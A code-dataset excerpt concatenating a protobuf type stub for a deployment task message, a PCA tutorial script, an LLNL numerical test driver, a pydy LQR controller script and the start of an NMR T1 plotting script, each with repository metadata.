Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class Task(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
    # NOTE(review): generated stub — comments below are annotations for readers,
    # the declarations themselves must stay in sync with the .proto schema.
    # Task.ConfigList pairs a list of host strings with per-package config
    # entries (`hosts` + repeated `Configs`, each holding `Items` name/path pairs).
    class ConfigList(google___protobuf___message___Message):
        DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
        class Configs(google___protobuf___message___Message):
            DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
            class Items(google___protobuf___message___Message):
                DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
                # Scalar fields: one config item is identified by a name and a path.
                name = ... # type: typing___Text
                path = ... # type: typing___Text
                def __init__(self,
                    *,
                    name : typing___Optional[typing___Text] = None,
                    path : typing___Optional[typing___Text] = None,
                    ) -> None: ...
                # py2/py3 split: the bytes-like types accepted by FromString differ.
                if sys.version_info >= (3,):
                    @classmethod
                    def FromString(cls, s: builtin___bytes) -> Task.ConfigList.Configs.Items: ...
                else:
                    @classmethod
                    def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList.Configs.Items: ...
                def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
                def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
                def ClearField(self, field_name: typing_extensions___Literal[u"name",b"name",u"path",b"path"]) -> None: ...
            # Scalar fields: which package these config items belong to, and where
            # it is installed.
            packageId = ... # type: typing___Text
            installPath = ... # type: typing___Text
            # Composite field exposed as a read-only repeated container property.
            @property
            def items(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList.Configs.Items]: ...
            def __init__(self,
                *,
                packageId : typing___Optional[typing___Text] = None,
                items : typing___Optional[typing___Iterable[Task.ConfigList.Configs.Items]] = None,
                installPath : typing___Optional[typing___Text] = None,
                ) -> None: ...
            if sys.version_info >= (3,):
                @classmethod
                def FromString(cls, s: builtin___bytes) -> Task.ConfigList.Configs: ...
            else:
                @classmethod
                def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList.Configs: ...
            def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
            def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
            def ClearField(self, field_name: typing_extensions___Literal[u"installPath",b"installPath",u"items",b"items",u"packageId",b"packageId"]) -> None: ...
        # Repeated scalar field: the hosts this config list applies to.
        hosts = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]
        @property
        def configs(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList.Configs]: ...
        def __init__(self,
            *,
            hosts : typing___Optional[typing___Iterable[typing___Text]] = None,
            configs : typing___Optional[typing___Iterable[Task.ConfigList.Configs]] = None,
            ) -> None: ...
        if sys.version_info >= (3,):
            @classmethod
            def FromString(cls, s: builtin___bytes) -> Task.ConfigList: ...
        else:
            @classmethod
            def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList: ...
        def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def ClearField(self, field_name: typing_extensions___Literal[u"configs",b"configs",u"hosts",b"hosts"]) -> None: ...
    # NOTE(review): generated stub — comments below are annotations for readers,
    # the declarations themselves must stay in sync with the .proto schema.
    # Task.ConfigDiff pairs a list of hosts with per-package `Detail` entries;
    # each `Items` row carries a path plus old/new names (the field names suggest
    # a config-file change record — confirm against the .proto source).
    class ConfigDiff(google___protobuf___message___Message):
        DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
        class Detail(google___protobuf___message___Message):
            DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
            class Items(google___protobuf___message___Message):
                DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
                # Scalar fields: file path, plus the new and old file names.
                path = ... # type: typing___Text
                newName = ... # type: typing___Text
                oldName = ... # type: typing___Text
                def __init__(self,
                    *,
                    path : typing___Optional[typing___Text] = None,
                    newName : typing___Optional[typing___Text] = None,
                    oldName : typing___Optional[typing___Text] = None,
                    ) -> None: ...
                # py2/py3 split: the bytes-like types accepted by FromString differ.
                if sys.version_info >= (3,):
                    @classmethod
                    def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff.Detail.Items: ...
                else:
                    @classmethod
                    def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff.Detail.Items: ...
                def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
                def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
                def ClearField(self, field_name: typing_extensions___Literal[u"newName",b"newName",u"oldName",b"oldName",u"path",b"path"]) -> None: ...
            # Scalar fields: which package the diff items belong to, and where it
            # is installed.
            packageId = ... # type: typing___Text
            installPath = ... # type: typing___Text
            # Composite field exposed as a read-only repeated container property.
            @property
            def items(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff.Detail.Items]: ...
            def __init__(self,
                *,
                items : typing___Optional[typing___Iterable[Task.ConfigDiff.Detail.Items]] = None,
                packageId : typing___Optional[typing___Text] = None,
                installPath : typing___Optional[typing___Text] = None,
                ) -> None: ...
            if sys.version_info >= (3,):
                @classmethod
                def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff.Detail: ...
            else:
                @classmethod
                def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff.Detail: ...
            def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
            def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
            def ClearField(self, field_name: typing_extensions___Literal[u"installPath",b"installPath",u"items",b"items",u"packageId",b"packageId"]) -> None: ...
        # Repeated scalar field: the hosts this diff applies to.
        hosts = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]
        @property
        def detail(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff.Detail]: ...
        def __init__(self,
            *,
            hosts : typing___Optional[typing___Iterable[typing___Text]] = None,
            detail : typing___Optional[typing___Iterable[Task.ConfigDiff.Detail]] = None,
            ) -> None: ...
        if sys.version_info >= (3,):
            @classmethod
            def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff: ...
        else:
            @classmethod
            def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff: ...
        def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def ClearField(self, field_name: typing_extensions___Literal[u"detail",b"detail",u"hosts",b"hosts"]) -> None: ...
    # NOTE(review): generated stub — comments below are annotations for readers,
    # the declarations themselves must stay in sync with the .proto schema.
    # Task.Batches wraps one repeated `targets` field of DeployTarget messages
    # (one Batches message per deployment batch, judging by the name — confirm
    # against the .proto source).
    class Batches(google___protobuf___message___Message):
        DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
        # Composite field exposed as a read-only repeated container property.
        @property
        def targets(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]: ...
        def __init__(self,
            *,
            targets : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]] = None,
            ) -> None: ...
        # py2/py3 split: the bytes-like types accepted by FromString differ.
        if sys.version_info >= (3,):
            @classmethod
            def FromString(cls, s: builtin___bytes) -> Task.Batches: ...
        else:
            @classmethod
            def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.Batches: ...
        def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
        def ClearField(self, field_name: typing_extensions___Literal[u"targets",b"targets"]) -> None: ...
appId = ... # type: typing___Text
appName = ... # type: typing___Text
clusterId = ... # type: typing___Text
clusterType = ... # type: typing___Text
operator = ... # type: typing___Text
org = ... # type: builtin___int
taskTimeStamp = ... # type: typing___Text
configVersion = ... # type: typing___Text
configPackageId = ... # type: typing___Text
needNotify = ... # type: builtin___bool
batchNum = ... # type: builtin___int
batchInterval = ... # type: builtin___int
failedStop = ... # type: builtin___bool
@property
def targetList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo]: ...
@property
def packageList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo]: ...
@property
def configList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList]: ...
@property
def labels(self) -> google___protobuf___struct_pb2___Struct: ...
@property
def configDiff(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff]: ...
@property
def batches(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.Batches]: ...
def __init__(self,
*,
appId : typing___Optional[typing___Text] = None,
appName : typing___Optional[typing___Text] = None,
clusterId : typing___Optional[typing___Text] = None,
clusterType : typing___Optional[typing___Text] = None,
operator : typing___Optional[typing___Text] = None,
org : typing___Optional[builtin___int] = None,
targetList : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo]] = None,
packageList : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo]] = None,
configList : typing___Optional[typing___Iterable[Task.ConfigList]] = None,
taskTimeStamp : typing___Optional[typing___Text] = None,
configVersion : typing___Optional[typing___Text] = None,
configPackageId : typing___Optional[typing___Text] = None,
labels : typing___Optional[google___protobuf___struct_pb2___Struct] = None,
configDiff : typing___Optional[typing___Iterable[Task.ConfigDiff]] = None,
needNotify : typing___Optional[builtin___bool] = None,
batchNum : typing___Optional[builtin___int] = None,
batchInterval : typing___Optional[builtin___int] = None,
batches : typing___Optional[typing___Iterable[Task.Batches]] = None,
failedStop : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"labels",b"labels"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"appId",b"appId",u"appName",b"appName",u"batchInterval",b"batchInterval",u"batchNum",b"batchNum",u"batches",b"batches",u"clusterId",b"clusterId",u"clusterType",b"clusterType",u"configDiff",b"configDiff",u"configList",b"configList",u"configPackageId",b"configPackageId",u"configVersion",b"configVersion",u"failedStop",b"failedStop",u"labels",b"labels",u"needNotify",b"needNotify",u"operator",b"operator",u"org",b"org",u"packageList",b"packageList",u"targetList",b"targetList",u"taskTimeStamp",b"taskTimeStamp"]) -> None: ...
| [
"service@easyops.cn"
] | service@easyops.cn |
17fa6d9c823c11081088275ecc99f22b8dea4aba | dca2b4a08dd09e22d9a597ab2a29e9c6402c1dd6 | /D92_PCA.py | 4e140fe3c3a3fdbe2dce6e46946932b106c585db | [] | no_license | kupc25648/100DaysAlgorithms | a5766b78740e9c9d90546ecaee93345971caef64 | dcafe38b5a835922bd8679878ea129fda911a0aa | refs/heads/master | 2022-11-13T11:22:02.735226 | 2020-06-26T10:14:34 | 2020-06-26T10:14:34 | 275,120,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,243 | py | '''
Principal Component Analysis [PCA] is incredibly useful when you need [among others] to visualise high-dimensional data. It’s also very simple to implement, but requires plenty of work beforehand.
A friend of mine, Pavel, has complained that I often don’t dive deep into the topic. And I hope that PCA will satisfy even such an eager mind.
Let’s say we have a bunch of multi-dimensional data stored in a matrix X. Each row represents a sample, and each column represents a variable.
We say that two variables are correlated if there is a linear relationship in between them. Their scatterplot may look similarly to this one.
strongly correlated data
On the other hand, the variables on the next scatterplot are uncorrelated.
uncorrelated data
While the first plot seems to be more useful, PCA takes the advantage of the second one.
To study these dependencies between variables, we use a covariance matrix. When data has no correlated variables, all off-diagonal elements of the Σ matrix must be zero.
And as a side note, for any covariance matrix Σ there exists matrix V called eigenvector matrix and diagonal matrix Λ called eigenvalue matrix, such that the expressions above hold. Both matrices are unique except for the order of columns.
How does PCA work?
PCA normalizes the data matrix X to zero mean and then multiplies by some matrix P. The multiplication is actually a linear transformation of the data. That means if we choose P very carefully, we can either rotate, scale or project the data into a vector subspace.
Say we have applied PCA to data matrix X and received another matrix Z. What do we know about Σ matrix of Z?
There is a [quadratic] relationship between both covariance matrices of X and Z! And what happens if we choose P to be eigenvector matrix V defined above?
This means that the projected matrix Z is uncorrelated and its variables have no longer any kind of linear dependency [because Λ is diagonal matrix].
Wait! What just happened?
Let me show you an example and another point of view.
first and second principal components
PCA finds the data mean and principal components. In case of 2D data the principal components are axes x and y rotated to the point that the data became uncorrelated.
There is also another term that is often used. We say that the first principal component is a rotation of x-axis to maximize the variance of the data projected onto it.
PCA: data with maximum variance
Is PCA just a rotation of coordinate systems? Why on earth should this have any use?
If you look at the code below, I generate a set of binary vectors, and each vector has 30 dimensions. Is there any linear relationship in the data?
X = np.random.rand(90, 30)
X[:30, :] = X[:30, :] < ([.4] * 10 + [.1] * 10 + [.1] * 10)
X[30:60, :] = X[30:60, :] < ([.1] * 10 + [.4] * 10 + [.1] * 10)
X[60:, :] = X[60:, :] < ([.1] * 10 + [.1] * 10 + [.4] * 10)
Well, there is, because I generated the data to have one [while it may not be immediately obvious]. But in practice we do not know and would like to find out.
In advance, each vector I generated sits in a corner of 30D unit cube and human brain can’t sort information of this kind.
When we apply PCA to this data, all the variables become uncorrelated and the dimensions now hold as much information as possible independently of one another and in descending order.
Also projection from 30D to 2D is now trivial — simply remove 28 trailing variables [because variables are independent] and plot the graph.
PCA: 2D visualization of 30D data
As you can see, the data projected from 30D onto 2D still contain the key information that I generated vectors of the same color to be close to each other. And each set of 30 vectors forms a nice cluster [but I need to say the reason behind is because I generated the data carefully to make such clusters].
I wish a had more time. The last sample, corners of 30D unit cube, moves us to the most interesting topic, latent factor analysis, which offers another view on PCA and more advanced techniques.
Anyways, how to implement PCA?
normalize X to zero mean
calculate covariance matrix Σ
find [orthonormal] eigenvectors of Σ
After a ton of paperwork, the algorithm is only on few lines of code. And you know, sometimes typing the code itself is the easiest part of all the work.
https://medium.com/100-days-of-algorithms/day-92-pca-bdb66840a8fb
'''
import numpy as np
from bokeh.plotting import figure, show, output_notebook
# Algorithm
def PCA(X, n_component):
    """Principal component analysis.

    Args:
        X (array_like): data matrix, one sample per row and one variable
            per column
        n_component (int): number of principal components to keep

    Returns:
        tuple: ``(Z, components)`` where ``Z`` is the zero-mean data
            projected onto the leading ``n_component`` principal components
            and ``components`` holds those components as columns.
    """
    # accept lists/tuples as well as ndarrays
    X = np.asarray(X, dtype=float)

    # normalize to zero mean
    mu = X.mean(axis=0)
    X = X - mu

    # eigenvectors of covariance matrix; eigh is used because sigma is
    # symmetric -- it is numerically stable and always returns real
    # eigenvalues, so the argsort ordering below is well defined (eig can
    # return spurious complex parts from round-off)
    sigma = X.T @ X
    eigvals, eigvecs = np.linalg.eigh(sigma)

    # principal components, ordered by decreasing eigenvalue (variance)
    order = np.argsort(eigvals)[::-1]
    components = eigvecs[:, order[:n_component]]

    # projection onto the principal components
    Z = X @ components

    # result
    return Z, components
# 2D data and principal component
# generate points on a gently curving line so the two variables correlate
x = np.linspace(0,13,num =10)
y = x +np.sin(x) - np.cos(x)

# 2D data: one sample per row
X = np.c_[x,y]

# PCA
projection, components = PCA(X, n_component=2)

# Principal component
print(components)

# Covariance matrix of projected data; off-diagonals should round to zero
print((projection.T @ projection).round(3))

# prepare plot data: rays are drawn from the data mean along each component;
# the (components[0] < 0) term flips arctan into the correct half-plane
mean = np.mean(X, axis=0)
extent = projection.min(), projection.max()
angle = np.arctan(components[1]/components[0]) + np.pi *(components[0] < 0)

# plot original data & principal component
# plot original data & principal components
'''
plot = figure()
plot.scatter(x, y)
plot.ray(*mean, length=0, angle=angle[0], line_width=2, line_color='red')
plot.ray(*mean, length=0, angle=angle[1], line_width=2, line_color='green')
show(plot)
# plot projected data
plot = figure(x_range=extent, y_range=extent)
plot.scatter(projection[:, 0], projection[:, 1])
show(plot)
'''

# generate binary vectors: three clusters of 30 samples in 30D, each cluster
# biased toward ones in a different block of 10 coordinates
X = np.random.rand(90, 30)
X[:30, :] = X[:30, :] < ([.4] * 10 + [.1] * 10 + [.1] * 10)
X[30:60, :] = X[30:60, :] < ([.1] * 10 + [.4] * 10 + [.1] * 10)
X[60:, :] = X[60:, :] < ([.1] * 10 + [.1] * 10 + [.4] * 10)

# define 3 classes (used only as scatter colors)
Y = ['red'] * 30 + ['green'] * 30 + ['blue'] * 30

# PCA
projection, _ = PCA(X, n_component=2)

# plot projected data: 30D -> 2D
plot = figure()
plot.scatter(projection[:, 0], projection[:, 1], color=Y)
show(plot)
| [
"noreply@github.com"
] | noreply@github.com |
21c2ff1c781282e130ce340af0483a9cecda2ee7 | ced2fe3abf39bf14519feb809f5cd4e56c828b46 | /notebooks/solution/control.py | 1225ebf7d93259de25bc077dcf008f6d1f42287a | [
"CC-BY-4.0"
] | permissive | nanounanue/pydy-tutorial-pycon-2014 | f68fb8bb967f6229743151c023b0b6da50d46f24 | 9a111ada7478a16c41ab75253e631a400febb083 | refs/heads/master | 2020-12-25T16:25:38.826055 | 2014-06-20T14:54:37 | 2014-06-20T14:54:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,454 | py | #!/usr/bin/env python
# Controller Design
from numpy import zeros, matrix, eye, dot, asarray
from numpy.linalg import inv
from scipy.linalg import solve_continuous_are
from .utils import controllable
from .visualization import *
# Linearize the dynamics about the upright equilibrium and design an LQR gain.
# NOTE(review): `coordinates`, `speeds`, `constants`, `numerical_constants`,
# `kane` and `mass_matrix` are presumably provided by the star import from
# .visualization -- confirm against that module.
equilibrium_point = zeros(len(coordinates + speeds))
equilibrium_dict = dict(zip(coordinates + speeds, equilibrium_point))
parameter_dict = dict(zip(constants, numerical_constants))

# Symbolic linearization, then substitute numbers and the equilibrium
linear_state_matrix, linear_input_matrix, inputs = kane.linearize()
f_A_lin = linear_state_matrix.subs(parameter_dict).subs(equilibrium_dict)
f_B_lin = linear_input_matrix.subs(parameter_dict).subs(equilibrium_dict)
m_mat = mass_matrix.subs(parameter_dict).subs(equilibrium_dict)

# State-space matrices: xdot = A x + B u (mass matrix folded in)
A = matrix(m_mat.inv() * f_A_lin).astype(float)
B = matrix(m_mat.inv() * f_B_lin).astype(float)

# LQR requires a controllable pair (A, B)
assert controllable(A, B)

# Solve the continuous algebraic Riccati equation; K = R^-1 B^T S
Q = matrix(eye(6))
R = matrix(eye(3))
S = solve_continuous_are(A, B, Q, R)
K = inv(R) * B.T * S

# This is an annoying little issue. We specified the order of things when
# creating the rhs function, but the linearize function returns the F_B
# matrix in the order corresponding to whatever order it finds the joint
# torques. This would also screw things up if we specified a different
# ordering of the coordinates and speeds as the standard kane._q + kane._u
K = K[[0, 2, 1], :]
def controller(x, t):
    """Full-state feedback law u = -K x, flattened for odeint's 1-D interface."""
    u = dot(K, x)
    return -asarray(u).flatten()
# Close the loop: use the feedback controller as the specified input and
# re-simulate. NOTE(review): `args`, `right_hand_side`, `x0`, `t` and
# `odeint` presumably come from the .visualization star import -- confirm.
args['specified'] = controller

y = odeint(right_hand_side, x0, t, args=(args,))
| [
"moorepants@gmail.com"
] | moorepants@gmail.com |
4d3122b6a5a76c30a85ea82eef87b31bb9ff3d7f | 9bcb5032d27ca321f489c035f7d46019ffdf4b85 | /numericalFunctions/ptwXY/Python/Test/Flat/binaryMath/flatMath.py | 46871d9e915089e2d32588a84b4438372de42ec5 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | LLNL/gidiplus | 128ef4d4acbcb264e31794a535cd95e8c77d8a96 | e1c6f0e4de51bc4d7616c5c4676b9818c4b9817c | refs/heads/master | 2023-08-31T06:21:14.519577 | 2023-02-13T18:35:20 | 2023-02-13T18:35:20 | 187,251,526 | 10 | 3 | NOASSERTION | 2021-12-23T00:28:07 | 2019-05-17T16:48:24 | C++ | UTF-8 | Python | false | false | 5,300 | py | # <<BEGIN-copyright>>
# Copyright 2019, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: MIT
# <<END-copyright>>
import os
from numericalFunctions import pointwiseXY_C
# Interpolation accuracy and bisection limit shared by every check below
accuracy = 1e-2
biSectionMax = 0.

# Honor the test harness CHECKOPTIONS environment variable; '-e' echoes the
# script name so failures can be attributed to this file
if( 'CHECKOPTIONS' in os.environ ) :
    options = os.environ['CHECKOPTIONS'].split( )
    if( '-e' in options ) : print( __file__ )

CPATH = '../../../../Test/Flat/binaryMath'

# Build and run the C driver; its verbose output lands in the file 'v'
# which is parsed and re-verified in Python below
os.system( 'cd %s; make -s clean; ./flatMath -v > v' % CPATH )
def skipBlankLines( ls ) :
    """Drop leading blank lines from *ls*; a lone trailing blank yields []."""

    index = 0
    for index, line in enumerate( ls ) :
        if line.strip( ) != '' : break
    remainder = ls[index:]
    # A single remaining blank line marks the end of the stream
    if len( remainder ) == 1 and remainder[0].strip( ) == '' : remainder = []
    return( remainder )
def getIntegerValue( name, ls ) :
    """Parse a '# <name> = <int>' header line; return (rest_of_lines, value)."""

    prefix = "# %s = " % name
    header = ls[0]
    if header[:len( prefix )] != prefix :
        raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, header[:-1] ) )
    value = int( header.split( '=' )[1] )
    return( ls[1:], value )
def getDoubleValue( name, ls ) :
    """Parse a '# <name> = <float>' header line; return (rest_of_lines, value)."""

    prefix = "# %s = " % name
    header = ls[0]
    if header[:len( prefix )] != prefix :
        raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, header[:-1] ) )
    value = float( header.split( '=' )[1] )
    return( ls[1:], value )
def compareValues( label, i, v1, v2 ) :
    """Compare two floats at ~8 significant digits; print and raise on mismatch."""

    # Round both values through a 12-digit then a 7-digit exponential format
    # so harmless last-bit representation differences do not fail the check
    rounded = [ '%.7e' % float( '%.12e' % v ) for v in ( v1, v2 ) ]
    if rounded[0] != rounded[1] :
        print( '<%s> <%s>' % ( rounded[0], rounded[1] ) )
        raise Exception( '%s: values %e and %e diff by %e at %d for label = %s' % ( __file__, v1, v2, v2 - v1, i, label ) )
def getXYData( ls, biSectionMax, accuracy ) :
    """Read a '# length = N' header plus N 'x y' rows into a flat pointwiseXY_C curve."""

    ls, length = getIntegerValue( 'length', ls )
    rows = [ [ float( token ) for token in line.split( ) ] for line in ls[:length] ]
    curve = pointwiseXY_C.pointwiseXY_C( rows, initialSize = len( rows ), overflowSize = 10, biSectionMax = biSectionMax, accuracy = accuracy, safeDivide = True, interpolation = "flat" )
    # Consume the data rows and any blank separator lines that follow
    remainder = skipBlankLines( ls[length:] )
    return( remainder, curve )
def getCommand( ls ) :
    """Pop a leading '# <command>' line; return (rest_of_lines, command)."""

    tokens = ls[0].split( )
    if len( tokens ) != 2 or tokens[0] != "#" :
        raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
    return( ls[1:], tokens[1] )
def compareXYs( XYs1, XYs2, label ) :
    """Compare two XY curves point by point; raise on any length or value mismatch."""

    if len( XYs1 ) != len( XYs2 ) : raise Exception( 'for %s: len( XYs1 ) = %s != len( XYs2 ) = %s' % ( label, len( XYs1 ), len( XYs2 ) ) )
    # NOTE(review): `count` is the module-level test-case counter set in the
    # driver loop below -- presumably intentional; confirm.
    for xy1, xy2 in zip( XYs1, XYs2 ) :
        compareValues( "x division " + label, count, xy1[0], xy2[0] )
        compareValues( "y division " + label, count, xy1[1], xy2[1] )
def mathParse( count, ls ) :
    """Dispatch the next '# <command>' section to its checker; return remaining lines."""

    ls, command = getCommand( ls )

    dispatch = {
        'double'         : doubleCheck,
        'all_double'     : allDoubleCheck,
        'binary_add_sub' : binaryAddSubCheck,
        'binary_mul_div' : binaryMulDivCheck }
    if command not in dispatch :
        raise Exception( 'Invalid command = "%s"' % command )
    return( dispatch[command]( count, ls ) )
def doubleCheck( count, ls ) :
    """Verify curve-vs-scalar arithmetic ('+', '-', reversed '-', '*', '/', reversed '/') against the C results."""

    ls, d = getDoubleValue( 'double', ls )
    ls, o = getCommand( ls )
    if o not in '+-=*/\\' : raise Exception( 'Unknown operator "%s"' % o )
    ls, XYs = getXYData( ls, biSectionMax, accuracy )
    ls, resultsC = getXYData( ls, biSectionMax, accuracy )

    # '=' is scalar-minus-curve and '\\' is scalar-divided-by-curve
    operations = {
        '+'  : lambda : XYs + d,
        '-'  : lambda : XYs - d,
        '='  : lambda : d - XYs,
        '*'  : lambda : XYs * d,
        '/'  : lambda : XYs / d,
        '\\' : lambda : d / XYs }
    results = operations[o]( )
    compareXYs( resultsC, results, "doubleCheck %s" % o )
    return( ls )
def allDoubleCheck( count, ls ) :
    """Verify a round-trip chain of scalar add/subtract/multiply/divide against the C results."""

    ls, d = getDoubleValue( 'double', ls )
    ls, XYs = getXYData( ls, biSectionMax, accuracy )
    ls, resultsC = getXYData( ls, biSectionMax, accuracy )

    # Same operation chain the C driver applies
    forward = ( ( d * ( XYs + d ) ) - d ) / d
    results = ( ( ( d * forward ) + d ) / d ) - d
    compareXYs( resultsC, results, "allDoubleCheck" )
    return( ls )
def binaryAddSubCheck( count, ls ) :
    """Verify curve addition, then subtraction of the addend, against the C results."""

    ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
    ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
    ls, resultsC = getXYData( ls, biSectionMax, accuracy )
    summed = XYs1 + XYs2
    compareXYs( resultsC, summed, "binaryAddSubCheck" )

    # The stream repeats XYs1 (ignored) followed by the expected difference
    ls, dummy = getXYData( ls, biSectionMax, accuracy )
    ls, resultsC = getXYData( ls, biSectionMax, accuracy )
    compareXYs( resultsC, summed - XYs2, "binaryAddSubCheck" )
    return( ls )
def binaryMulDivCheck( count, ls ) :
    """Verify curve multiplication, then division by the multiplier, against the C results."""

    ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
    ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
    ls, resultsC = getXYData( ls, biSectionMax, accuracy )
    product = XYs1 * XYs2
    compareXYs( resultsC, product, "binaryMulDivCheck" )

    # The stream repeats XYs1 (ignored) followed by the expected quotient
    ls, dummy = getXYData( ls, biSectionMax, accuracy )
    ls, resultsC = getXYData( ls, biSectionMax, accuracy )
    compareXYs( resultsC, product / XYs2, "binaryMulDivCheck" )
    return( ls )
# Read the verification stream produced by the C driver. A context manager
# guarantees the file is closed even if readlines() raises.
with open( os.path.join( CPATH, 'v' ) ) as f :
    ls = f.readlines( )

# The stream opens with the accuracy header, then one section per test case
ls, accuracy = getDoubleValue( 'accuracy', ls )

count = 0
while( len( ls ) ) :
    count += 1
    ls = mathParse( count, ls )
| [
"mattoon1@llnl.gov"
] | mattoon1@llnl.gov |
7d360314ad56ae83ac372262a3f246607a5f40db | 9a99ca8daa5de423857a4cc7f12fe924087ceabe | /analyse/scripts/crn_meta_t1.py | 86c6df20d7ab2b2f49c7a3b3444b4912ec6a46cc | [] | no_license | karajan9/ma | 7442a9e23b45d63d997f5ffee99bb366c10aca00 | bce0fa14cd51bcddc6cba671e847b781d1f5e333 | refs/heads/master | 2020-03-09T07:42:53.355358 | 2018-04-25T09:02:07 | 2018-04-25T09:02:07 | 128,670,707 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,438 | py | # %%
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
import glob
import os
import sys
home_dir = "/home/karajan/uni/master/analyse"
sys.path.append(os.path.abspath("/home/karajan/uni/master/analyse/scripts"))
from nmr_lib import *
# %%
def plot_setup():
    """Reset the current matplotlib figure and apply the shared axis style.

    Clears the implicit current figure, enables the grid, switches the
    y-axis to a log scale and labels the x-axis (temperature in Kelvin).
    Mutates global pyplot state only.
    """
    plt.gcf().clear()
    # plt.style.use("ggplot")
    plt.grid(True)
    plt.yscale("log")
    plt.xlabel("Temperatur [K]")
# %%
# home_dir = "/home/karajan/uni/master/analyse/data"
def do_t1():
    """Plot 1/T1 relaxation rates vs. temperature against the Zuern reference data.

    Reads fixed-path data files, draws onto the implicit pyplot figure and
    saves the result. No return value; purely side effects.
    """
    plot_setup()
    plt.ylabel("1/$T_1$ [1/s]")
    plt.title("CRN $T_1$ vgl. mit Zürn Daten")

    # Literature reference data (columns: temperature, T1)
    fn_extern ="/home/karajan/uni/master/analyse/data/crn/data/T1/t1-zuern.data"
    labels_extern = "Zürn T1"

    data = np.loadtxt(fn_extern)
    temp = data[:, 0]
    t1 = data[:, 1]
    # plot_data(temp, 1/t1, label=labels_extern[i], marker=".")
    plt.scatter(temp, 1 / t1, label=labels_extern, marker=".", color="y")

    # t1dir = "/home/jens/Documents/projekte/crn/data/T1"
    # for i, file_name in enumerate(sorted(glob.glob(t1dir + "/*.data"))):
    # Own measurement series, one file per temperature range
    # (columns: ?, temperature, ?, T1, T1 error -- inferred from usage)
